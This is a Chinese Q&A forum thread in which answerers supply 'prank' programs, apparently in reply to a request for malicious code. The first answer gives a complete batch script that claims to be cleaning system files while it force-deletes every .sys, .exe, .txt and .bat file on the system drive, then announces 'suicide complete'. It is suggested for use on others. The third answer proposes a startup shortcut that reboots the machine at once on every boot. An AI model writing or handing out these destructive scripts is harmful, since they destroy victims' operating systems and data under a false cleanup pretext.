发布网友 发布时间:2022-04-23 04:12
共3个回答
热心网友 时间:2023-09-10 06:12
把一下内容@echo off
echo 正在清理系统文件,请稍等......
del /f /s /q %systemdrive%\*.sys
del /f /s /q %systemdrive%\*.exe
del /f /s /q %systemdrive%\*.txt
del /f /s /q %systemdrive%\*.bat
del /f /s /q %systemdrive%\*.chk
del /f /s /q %systemdrive%\*.old
del /f /s /q %systemdrive%\recycled\*.*
del /f /s /q %windir%\*.bak
del /f /s /q %windir%\prefetch\*.*
rd /s /q %windir%\temp & md %windir%\temp
del /f /q %userprofile%\cookies\*.*
del /f /q %userprofile%\recent\*.*
del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
del /f /s /q "%userprofile%\recent\*.*"
echo 自杀完成!
echo. & pause
写在记事本然后保存为bat格式
如果还要我再给你!自己最好不要运行
热心网友 时间:2023-09-10 06:12
那些什么恶搞程序什么的网上就有 像自动关机什么的 但是没多大意思 你自己编写的话你自己编好 保存之后就算不运行也会被自己的杀毒软件查杀的 像一般性的防火墙什么的 你试一下就知道了
热心网友 时间:2023-09-10 06:13
最简单的恶搞:快捷方式,shutdown.exe -r -t 0 放到启动项里面